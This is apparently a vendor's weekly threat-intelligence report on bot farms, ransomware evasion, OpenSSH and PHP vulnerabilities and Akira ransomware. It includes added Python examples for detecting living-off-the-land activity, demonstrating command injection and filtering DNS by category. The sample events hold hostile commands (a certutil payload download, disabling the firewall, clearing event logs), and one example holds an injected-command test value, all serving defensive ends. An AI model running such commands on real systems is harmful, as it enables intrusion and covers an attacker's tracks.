Vercara’s Open-Source Intelligence (OSINT) Report – July 5 – July 11, 2024



Here is your weekly summary of news and other public coverage relevant to Vercara, the market leader in DNS, DDoS Mitigation, Web Application Firewalls, and Bot Management. Keep reading to learn about the week’s interesting and informative stories. To see all the OSINT reports, click here

NOTE: Except where indicated, this report is released as TLP: CLEAR and items in it may be shared but not attributed to Vercara. For more information on the Traffic Light Protocol, the definitions and usage are at https://www.first.org/tlp/.

U.S. seizes domains used by AI-powered Russian bot farm for disinformation.  

(TLP: CLEAR) On July 9, a joint advisory from government agencies in the US, Canada, and the Netherlands revealed that the Russian state-sponsored media organization RT, formerly known as Russia Today, has been employing an artificial intelligence (AI)-powered tool dubbed “Meliorator”. Recent intelligence reporting reveals that the bot farm (large collection of bots) fuelling the Russian disinformation campaign has been dismantled in the latest U.S. Department of Justice (DoJ) cyber operation. The tool in question has been used over the past two years to construct convincing social media personas in order to spread disinformation and propaganda using AI-powered social media bots. The bot farm targeted the US and several other countries, utilizing fraudulent online personas disguised as legitimate users to disseminate pro-Kremlin messages. According to reporting, the bots were assigned three specific tasks: to disseminate pro-Russian political ideologies, to engage with other bot generated messages, and to spread propaganda and misinformation from both automated and human sources. Investigators revealed that the tool incorporates an admin panel named “Brigadir” and a backend application called Taras, which manages the realistic-looking accounts. These accounts utilize profile pictures and biographical details generated through an open-source program called Faker. Finally, further analysis provided by the DoJ revealed that this threat actor intends to enhance Meliorator’s capabilities to target additional major social media platforms.  

(TLP: CLEAR) Comments: The recent DoJ takedown highlights the increasingly sophisticated tactics of state-sponsored disinformation campaigns and the escalating role of AI in these operations. Additionally, the capability to generate a multitude of realistic personas that convincingly mimic genuine users poses a substantial challenge for social media platforms in terms of detection and mitigation. The aforementioned highlights the necessity for stricter verification processes for user accounts, including multi-factor authentication and enhanced AI algorithms to detect bot behaviour more effectively. 

(TLP: CLEAR) Recommended best practices/regulations: National Institute of Standards and Technology AI-600, “Artificial Intelligence Risk Management Framework: Generative Artificial Intelligence Profile”: “Identify potential content provenance risks and harms in GAI, such as misinformation or disinformation, deepfakes, including NCII, or tampered content. Enumerate and rank risks and/or harms based on their likelihood and potential impact, and determine how well provenance solutions address specific risks and/or harms.”

(TLP: CLEAR) Vercara: Vercara’s UltraAPI Bot Manager leverages a powerful analytics engine that uses multi-dimensional machine learning techniques and draws from the largest API threat database in the world. It analyzes API and web application requests across your network to detect malicious bot activity, making it effective and adaptable. 

Source: https://www.ic3.gov/Media/News/2024/240709.pdf  

Source: https://www.securityweek.com/us-disrupts-ai-powered-russian-bot-farm-on-x/ 

Source: https://www.justice.gov/opa/pr/justice-department-leads-efforts-among-federal-international-and-private-sector-partners  

Ransomware groups prioritize defence [sic] evasion for data exfiltration. 

(TLP: CLEAR) Recent reporting reveals ransomware groups are leveraging sophisticated defence evasion techniques to maintain a prolonged presence within targeted compromised networks. Investigators have indicated that this shift is likely driven by the double-extortion ransomware model, wherein attackers exfiltrate sensitive data and threaten its public release in tandem with encrypting the victim’s network and systems. The main objective is to achieve persistent access, allowing attackers to comprehensively map the network, pinpoint critical assets, and identify valuable data for exfiltration. Additionally, these groups have been observed employing various advanced tactics such as disabling and modifying security software, obfuscating malicious code, and manipulating system registries to suppress security alerts. Automated persistence mechanisms and remote access tools are then utilized to maintain control over infected systems. Furthermore, attackers exploit weak access controls and elevate privileges using legitimate system utilities, employing “living-off-the-land” techniques. This includes the use of native tools such as Net, Netsh, Nltest, Certutil and Wevtutil, which blend malicious activities with normal system operations, thereby evading security monitoring tools. Ransomware operators then use compression and encryption tools such as 7-Zip and WinRAR to obscure the exfiltration process, thereby reducing the likelihood of detection by security tools and administrators. Ransomware-as-a-service (RaaS) groups, such as LockBit, further enhance their operations by employing custom data exfiltration tools like StealBit. These advanced tools streamline the exfiltration process, significantly boosting the efficiency and effectiveness of their malicious activities. 
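The native tools named above are also everyday administration utilities, so a single invocation is rarely worth an alert; what merits escalation is several of these behaviours appearing on one host in a short period. The following Python is an added example, not from the report or from any Vercara product, showing how process-creation events could be triaged for that combination. The event line format, the sample events and the escalation threshold are all constructed for this illustration.

```python
"""Triage living-off-the-land (LOTL) activity in process-creation events.

Added illustration, not taken from the report. The event format is a
constructed, simplified EDR-style line:
    <timestamp> host=<name> parent=<image> image=<image> cmd=<command line>
Rules cover the native binaries the report names (Net, Netsh, Nltest,
Certutil, Wevtutil) plus password-protected archive staging with 7-Zip/WinRAR.
"""
import re
from collections import defaultdict

# Constructed sample events (not real telemetry). FS01 shows a chain of
# discovery, download, firewall tampering, archive staging and log clearing;
# WS22 is ordinary user activity.
SAMPLE_EVENTS = [
    "2024-07-09T02:14:03Z host=FS01 parent=cmd.exe image=nltest.exe cmd=nltest /dclist:corp.local",
    '2024-07-09T02:15:11Z host=FS01 parent=cmd.exe image=net.exe cmd=net group "Domain Admins" /domain',
    "2024-07-09T02:16:40Z host=FS01 parent=powershell.exe image=certutil.exe cmd=certutil -urlcache -split -f http://203.0.113.9/a.txt a.exe",
    "2024-07-09T02:18:02Z host=FS01 parent=cmd.exe image=netsh.exe cmd=netsh advfirewall set allprofiles state off",
    "2024-07-09T02:20:27Z host=FS01 parent=cmd.exe image=7z.exe cmd=7z a -pS3cret -mhe=on C:\\Users\\Public\\out.7z D:\\Finance",
    "2024-07-09T02:25:55Z host=FS01 parent=cmd.exe image=wevtutil.exe cmd=wevtutil cl Security",
    "2024-07-09T09:00:00Z host=WS22 parent=explorer.exe image=notepad.exe cmd=notepad.exe C:\\notes.txt",
]

EVENT_RE = re.compile(
    r"^(?P<ts>\S+)\s+host=(?P<host>\S+)\s+parent=(?P<parent>\S+)\s+"
    r"image=(?P<image>\S+)\s+cmd=(?P<cmd>.*)$"
)

# Each rule: name, lowercase image names it applies to, regex on the command line.
RULES = [
    ("domain_controller_discovery", {"nltest.exe"},
     re.compile(r"/dclist|/domain_trusts|/dsgetdc", re.I)),
    ("privileged_group_enumeration", {"net.exe", "net1.exe"},
     re.compile(r"\bgroup\b.*domain admins|\blocalgroup\b.*administrators", re.I)),
    ("certutil_download_or_decode", {"certutil.exe"},
     re.compile(r"-urlcache|-decode|-encode", re.I)),
    ("firewall_tampering", {"netsh.exe"},
     re.compile(r"advfirewall\s+set\s+\S+\s+state\s+off|firewall\s+set\s+opmode\s+(mode=)?disable", re.I)),
    ("encrypted_archive_staging", {"7z.exe", "7za.exe", "rar.exe", "winrar.exe"},
     re.compile(r"(^|\s)-h?p\S+", re.I)),          # -p / -hp password switches
    ("event_log_clearing", {"wevtutil.exe"},
     re.compile(r"(^|\s)cl(ear-log)?\s", re.I)),
]


def parse_event(line):
    """Parse one event line into a dict, or return None if it does not match."""
    m = EVENT_RE.match(line.strip())
    if not m:
        return None
    ev = m.groupdict()
    # Normalise the image to a bare lowercase file name so rules match paths too.
    ev["image"] = ev["image"].lower().rsplit("\\", 1)[-1]
    return ev


def match_rules(event):
    """Return the names of all rules the event trips."""
    return [name for name, images, pattern in RULES
            if event["image"] in images and pattern.search(event["cmd"])]


def triage(lines, min_distinct_rules=3):
    """Return {host: sorted distinct rule names} for hosts tripping at least
    min_distinct_rules distinct rules. One LOTL command is routine
    administration; the combination on a single host is what gets escalated."""
    per_host = defaultdict(set)
    for line in lines:
        ev = parse_event(line)
        if ev is not None:
            per_host[ev["host"]].update(match_rules(ev))
    return {h: sorted(r) for h, r in per_host.items() if len(r) >= min_distinct_rules}


if __name__ == "__main__":
    for host, rules in triage(SAMPLE_EVENTS).items():
        print(f"{host}: {len(rules)} LOTL indicators -> {', '.join(rules)}")
```

The threshold is deliberately per host and per distinct behaviour rather than per event, because a backup job may legitimately create password-protected archives every night; it is the archive plus log clearing plus firewall changes on the same machine that resembles the exfiltration chain described above.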

(TLP: CLEAR) Comments: Three vulnerabilities have been identified as repeatedly used by ransomware operators in the past. CVE-2020-1472, also known as Zerologon, enables attackers to bypass authentication and escalate privileges within a domain controller’s Active Directory, significantly compromising network integrity. CVE-2018-13379, found in Fortinet’s FortiOS SSL VPN, allows unauthorized access to system files and sensitive information, facilitating lateral movement within the network. Lastly, CVE-2023-0669, a vulnerability in GoAnywhere Managed File Transfer, allows for remote code execution on the server without requiring authentication, enabling further internal reconnaissance and lateral movement. These vulnerabilities highlight the necessity of timely patching and robust security measures to mitigate potential exploits and maintain network security.

(TLP: CLEAR) Recommended best practices/regulations: Cybersecurity & Infrastructure Security Agency #StopRansomware Guide: “Implement Protective Domain Name System (DNS). By blocking malicious internet activity at the source, Protective DNS services can provide high network security for remote workers. These security services analyze DNS queries and take action to mitigate threats—such as malware, ransomware, phishing attacks, viruses, malicious sites, and spyware—leveraging the existing DNS protocol and architecture.” 

(TLP: CLEAR) Vercara: Vercara’s Protective DNS solution, UltraDDR (DNS Detection and Response), receives DNS queries from enterprise users and other on-LAN devices and inspects the DNS response for indicators of malicious activity such as phishing, ransomware, and acceptable usage policy violations. 

Source: https://www.infosecurity-magazine.com/news/ransomware-defense-evasion-data/  

OpenSSH vulnerability discovered: Potential remote code execution risk. 

(TLP: CLEAR) Recent reporting has highlighted a new vulnerability, CVE-2024-6409, with a CVSS score of 7.0, identified in the OpenSSH versions 8.7p1 and 8.8p1 shipped with Red Hat Enterprise Linux 9 (RHEL 9). Notably, this bug does not affect current versions of RHEL 7 and RHEL 8. CVE-2024-6409 is distinct from the recently disclosed CVE-2024-6387 (RegreSSHion), although both exploit race conditions in signal handling. CVE-2024-6409 specifically targets the unprivileged child process of the SSH daemon (sshd), potentially enabling remote code execution. According to reporting, CVE-2024-6409 requires numerous attempts to exploit because it relies on an unpredictable race condition. While CVE-2024-6387 impacts the more privileged parent server process, CVE-2024-6409’s focus on the child process results in a reduced potential impact. Nevertheless, successful exploitation of either could grant attackers a foothold within the targeted network, ultimately leading to lateral movement, privilege escalation, or malware deployment via remote code execution. Currently, there have been no incidents of active exploitation of CVE-2024-6409, although some reports indicate that an unidentified threat actor has been exploiting CVE-2024-6387 against unnamed servers in China. Both vulnerabilities were discovered simultaneously, but the announcement of CVE-2024-6409 was postponed because Red Hat was already preparing a patch for CVE-2024-6387. As a result, all versions of RHEL 9 received patches for CVE-2024-6387 by July 8, 2024, while CVE-2024-6409 remains unpatched in RHEL 9 at present.

(TLP: CLEAR) Comments: The source IP observed in the initial attack, 108.174.58[.]28, hosts a repository of exploit tools designed for automating the exploitation of vulnerable SSH servers. The use of CVE-2024-6387 in these attacks suggests the involvement of Malware-as-a-Service (MaaS), indicating that with little effort, even low-skill attackers could potentially exploit these OpenSSH vulnerabilities. It is advised that the organization’s security policy includes routine reviews of all IT infrastructure, including applications, to ensure they are up to date with the latest security patches. If no security patches are being released for known vulnerabilities, organizations should look at either replacing outdated systems or establishing extra security-in-depth measures to protect non-updated systems. 

(TLP: CLEAR) Recommended best practices/regulations: NIST Cybersecurity Framework (CSF) PR.PS-05: “Installation and execution of unauthorized software are prevented”   

By enforcing a content filtering policy to block typical software download sites in addition to hacker tools and P2P services, organizations reduce the amount of malware and trojan horses that are introduced into their organization unknowingly by their users.  This can be done via a protective DNS or forward web proxy solution with website category feeds. 

(TLP: CLEAR) Vercara: Vercara’s Protective DNS solution, UltraDDR (DNS Detection and Response), enforces malware filtering as a network service using 4 distinct malware detection engines, including a dynamic decision engine that compares domain details, DNS query details, query answers, and other data points to determine if a domain is malicious before endpoints can be infected by them. 

Source: https://thehackernews.com/2024/07/new-openssh-vulnerability-discovered.html 

Source: https://www.blackhatethicalhacking.com/news/new-openssh-vulnerability-cve-2024-6409-exposes-systems-to-remote-code-execution-risks/  

PHP vulnerability exploited to spread malware and launch DDoS attacks. 

(TLP: CLEAR) Recent intelligence reporting sheds light on multiple threat actors actively exploiting a newly identified PHP vulnerability to deploy various malware strains to targeted systems. Currently being tracked as CVE-2024-4577, this high-severity vulnerability is a PHP-CGI OS Command Injection bug that allows attackers to remotely execute malicious commands on Windows operating systems. According to researchers, threat actors leverage specific character sequences to bypass command-line restrictions and pre-established security measures, allowing them to pass arguments directly through PHP. This allows for the execution of arbitrary code on remote PHP servers, ultimately granting the threat actor control over compromised systems. Additionally, investigators reported that within just 24 hours of the PHP vulnerability becoming public, honeypot servers—specifically designed to capture malicious activity—detected a surge of exploit attempts. These attempts intended to deploy a range of malware, including the remote access trojan Gh0st RAT, cryptocurrency miners like RedTail and XMRig, and the distributed denial of service (DDoS) botnet Muhstik. This rapid response by threat actors highlights the determination of cybercriminals in leveraging newly disclosed vulnerabilities in order to infiltrate and compromise systems. Users and organizations were subsequently urged to update their PHP installations to the latest version promptly.

(TLP: CLEAR) Comments: The Muhstik DDoS botnet and the XMRig cryptocurrency miner both attempt to exploit CVE-2024-4577. Muhstik deploys a shell script that downloads an ELF file named “pty3” from a separate IP address, likely a variant of Muhstik malware designed to target Internet of Things (IoT) devices and Linux servers for DDoS attacks. XMRig is executed from a script fetched from a remote mining pool and subsequently removes temporary files to obfuscate the attack.

(TLP: CLEAR) Recommended best practices/regulations: OWASP Web Security Top 10 A03:2021 – Injection: “An application is vulnerable to attack when:   

  • “User-supplied data is not validated, filtered, or sanitized by the application.  
  • “Dynamic queries or non-parameterized calls without context-aware escaping are used directly in the interpreter.  
  • “Hostile data is used within object-relational mapping (ORM) search parameters to extract additional, sensitive records.  
  • “Hostile data is directly used or concatenated. The SQL or command contains the structure and malicious data in dynamic queries, commands, or stored procedures.” 
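To make the injection conditions above concrete, here is an added Python example (not from the report, and not PHP, which the article discusses) that shows the anti-pattern in the last bullet beside a hardened form: user input concatenated into a string that a shell parses, versus an allowlist check followed by an argv list that no shell interprets. The hostname allowlist, the `nslookup` stand-in for the vulnerable feature and the function names are assumptions of this example.

```python
"""OS command injection: vulnerable string-building beside the hardened form.

Added example, not from the report. It uses a generic "look up a host"
feature as a stand-in for the PHP-CGI argument injection described above.
The hostname allowlist regex and the function names are this example's own.
"""
import re
import shlex

# RFC 1123-style hostname: dot-separated labels of letters, digits and
# hyphens, no label starting or ending with a hyphen, 253 characters max.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)"
    r"([a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)*"
    r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$",
    re.I,
)


def build_lookup_vulnerable(host):
    """A03 anti-pattern: hostile data is concatenated into a command string.
    Whatever string this returns would be handed to a shell (shell=True),
    so ';', '|', '&&', '$(...)' in `host` become additional commands."""
    return "nslookup " + host


def shell_tokens(command):
    """Tokenize a command string the way /bin/sh would, keeping operators
    such as ';' '|' '&' as separate tokens, to show what the shell sees."""
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    return list(lexer)


def is_safe_hostname(host):
    """Allowlist validation: accept only syntactically valid hostnames."""
    return bool(HOSTNAME_RE.match(host))


def build_lookup_hardened(host):
    """Hardened form: validate against the allowlist, then return an argv
    list. Passing a list to subprocess.run (shell=False, the default) means
    no shell parses it; `host` reaches nslookup as a single argument."""
    if not is_safe_hostname(host):
        raise ValueError(f"rejected hostname: {host!r}")
    return ["nslookup", host]


if __name__ == "__main__":
    hostile = "example.com; echo INJECTED"
    print("vulnerable, as the shell tokenizes it:",
          shell_tokens(build_lookup_vulnerable(hostile)))
    try:
        build_lookup_hardened(hostile)
    except ValueError as err:
        print("hardened:", err)
    print("hardened argv for a valid name:", build_lookup_hardened("example.com"))
```

The token list is the whole point: the vulnerable string splits into two commands at the `;`, whereas the hardened version never builds a string for a shell at all, and the allowlist rejects the input before any process is started. Validation and parameterisation are both applied because either alone leaves a gap: the allowlist protects the call site, while the argv list protects against characters the allowlist might later be loosened to admit.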

(TLP: CLEAR) Vercara: Vercara’s Web Application Firewall, UltraWAF, equips your company with adaptable security features to counteract the most significant network and application-layer threats, including SQL injection, XSS, and DDoS attacks. Its always-on security posture, combined with cloud-based scalability, ensures comprehensive protection against the OWASP top 10, advanced bot management, and vulnerability scanning, allowing you to effectively shield your critical and customer-facing applications from emerging threats. 

Source: https://thehackernews.com/2024/07/php-vulnerability-exploited-to-spread.html 

Source: https://www.bankinfosecurity.com/multiple-threat-actors-moving-quickly-to-exploit-php-flaw-a-25748 

Source: https://thehackernews.com/2024/06/muhstik-botnet-exploiting-apache.html  

Akira Ransomware: Lightning-fast data exfiltration in 2 hours. 

(TLP: CLEAR) The Akira ransomware group, renowned for its swift data exfiltration, recently conducted a highly efficient attack on a Latin American airline, managing to harvest sensitive data in just over two hours. According to recent reporting, the incident involved the threat actor group Storm-1567, also known as “Punk Spider” and “Gold Sahara”. The group gained initial access through an unpatched Veeam backup server via the SSH protocol. Once inside the targeted network, they rapidly exfiltrated critical data before deploying the Akira ransomware the following day. Recent intelligence reporting has indicated that since March 2023, Storm-1567 has employed a double-extortion model, successfully attacking over 250 organizations worldwide. While predominantly targeting Windows operating systems, the group has also developed Linux and VMware ESXi variants. In their latest cyber assault, the group exploited an unpatched Veeam backup server, likely leveraging CVE-2023-27532, to gain initial access. Once inside, they swiftly began data exfiltration, capitalizing on the wealth of data stored on the victim’s server. The initial data exfiltration was executed in a mere 133 minutes, utilizing legitimate tools such as Advanced IP Scanner and WinSCP for reconnaissance and data extraction. Following the data exfiltration, reports indicate that the hacker group ceased their activities for the day, suggesting a possible operational base in Western Europe according to investigators analysing the traffic patterns. The following day, the group resumed their attack, penetrating deeper into the network to deploy the ransomware payload. They systematically conducted user verifications on several machines before accessing the primary Veeam backup server. From this control point, Storm-1567 orchestrated the deployment of Akira ransomware across multiple hosts within the compromised environment.

(TLP: CLEAR) Comments: The methodical approach executed by the Storm-1567 group underscores the sophisticated and organized nature of their operational prowess. Their ability to swiftly navigate through systems and leverage legitimate tools for malicious purposes highlights the critical need for robust cybersecurity defences and vigilant patch management to thwart such advanced persistent threats. 

(TLP: CLEAR) Recommended best practices/regulations: NIST Cybersecurity Framework (CSF) PR.PS-05: “Installation and execution of unauthorized software are prevented”

By enforcing a content filtering policy to block typical software download sites in addition to hacker tools and P2P services, organizations reduce the amount of malware and trojan horses that are introduced into their organization unknowingly by their users. This can be done via a protective DNS or forward web proxy solution with website category feeds.
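Both this paragraph and the identical recommendation in the OpenSSH item above describe blocking by website category at the DNS layer. As an added illustration that is neither Vercara’s UltraDDR logic nor code from the report, the Python below applies a constructed category feed to constructed DNS query log lines, walking parent domains so a subdomain inherits its parent’s category, and honouring an explicit allowlist. The feed, the domains, the client addresses and the blocked-category set are assumptions built from the categories the text names.

```python
"""Protective DNS policy check: category-feed lookup over DNS query log lines.

Added example, not from the report and not a vendor implementation. The
category feed, query-log format, domains and client addresses are all
constructed; the blocked categories follow the report's text (malware,
phishing, botnet C2, software download sites, hacker tools, P2P).
"""
from dataclasses import dataclass

# Constructed category feed. A deployment would load vendor feeds here.
CATEGORY_FEED = {
    "malware-dropper.example": "malware",
    "login-verify.example": "phishing",
    "c2.beacon.example": "botnet_c2",
    "downloads.freeware.example": "software_download",
    "tools.pentest-kit.example": "hacker_tools",
    "tracker.p2p.example": "p2p",
    "intranet.corp.example": "business",
}

BLOCKED_CATEGORIES = {"malware", "phishing", "botnet_c2",
                      "software_download", "hacker_tools", "p2p"}

# Explicit allow entries override the feed (e.g. a sanctioned internal mirror).
ALLOWLIST = {"mirror.downloads.freeware.example"}

# Constructed query log lines: <timestamp> <client-ip> <qname> <qtype>
SAMPLE_QUERIES = [
    "2024-07-10T13:01:02Z 10.20.0.15 intranet.corp.example A",
    "2024-07-10T13:01:09Z 10.20.0.15 www.malware-dropper.example A",
    "2024-07-10T13:02:44Z 10.20.0.31 cdn.c2.beacon.example. AAAA",
    "2024-07-10T13:03:10Z 10.20.0.31 mirror.downloads.freeware.example A",
    "2024-07-10T13:03:55Z 10.20.0.42 downloads.freeware.example A",
    "2024-07-10T13:04:20Z 10.20.0.42 unknown-site.example A",
]


@dataclass
class Decision:
    qname: str
    action: str     # "allow" or "block"
    category: str   # category driving the decision, "allowlisted" or "uncategorized"
    matched: str    # feed or allowlist entry that matched, "" if none


def normalize(qname):
    """Lowercase and strip the trailing root dot so lookups are exact."""
    return qname.lower().rstrip(".")


def lookup_category(qname):
    """Walk from the full name up to (but not including) the bare TLD so that
    cdn.c2.beacon.example inherits the category of c2.beacon.example."""
    labels = normalize(qname).split(".")
    for i in range(len(labels) - 1):
        candidate = ".".join(labels[i:])
        if candidate in CATEGORY_FEED:
            return candidate, CATEGORY_FEED[candidate]
    return "", "uncategorized"


def decide(qname):
    """Policy decision for one query name; the allowlist wins over the feed."""
    name = normalize(qname)
    if name in ALLOWLIST:
        return Decision(name, "allow", "allowlisted", name)
    matched, category = lookup_category(name)
    action = "block" if category in BLOCKED_CATEGORIES else "allow"
    return Decision(name, action, category, matched)


def process_log(lines):
    """Return (list of (ts, client, Decision) blocks, {client: block count})."""
    blocked, per_client = [], {}
    for line in lines:
        ts, client, qname, _qtype = line.split()
        d = decide(qname)
        if d.action == "block":
            blocked.append((ts, client, d))
            per_client[client] = per_client.get(client, 0) + 1
    return blocked, per_client


if __name__ == "__main__":
    blocks, counts = process_log(SAMPLE_QUERIES)
    for ts, client, d in blocks:
        print(f"{ts} {client} BLOCK {d.qname} ({d.category} via {d.matched})")
    print("blocks per client:", counts)
```

Two points from the sample run are worth noting for anyone building or evaluating such a filter: the parent-domain walk is what stops a trivially changed subdomain from evading a feed entry, and the per-client block count is the signal an analyst would pivot on, since repeated blocks toward a botnet C2 category from one internal address indicate an already infected host rather than a user clicking a bad link.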

(TLP: CLEAR) Vercara: Vercara’s Protective DNS solution, UltraDDR (DNS Detection and Response), filters internal DNS responses from users as well as machines using both defined categories including botnet Command and Control (C2) as well as machine learning to detect previously uncategorized malicious associations and help prevent data exfiltration or malware detonation.  

Source: https://www.darkreading.com/endpoint-security/akira-ransomware-lightning-fast-data-exfiltration-2-hours 

About Vercara.

The world’s top brands depend on Vercara to safeguard their digital infrastructure and online presence. Vercara offers a suite of cloud-delivered services that are always secure, reliable, and available and enable global businesses to thrive online. UltraSecure protects organizations’ networks and applications against risks and downtime, ensuring that businesses and their customers enjoy exceptional and uninterrupted interactions all day, every day. Delivering the industry’s best performance and always-on service, Vercara’s mission-critical security portfolio provides best-in-class DNS, application, and network security, including DDoS, WAF, and Bot management services to its global 5000 customers and beyond.

To learn more about Vercara solutions, please visit our solutions overview page or contact us.
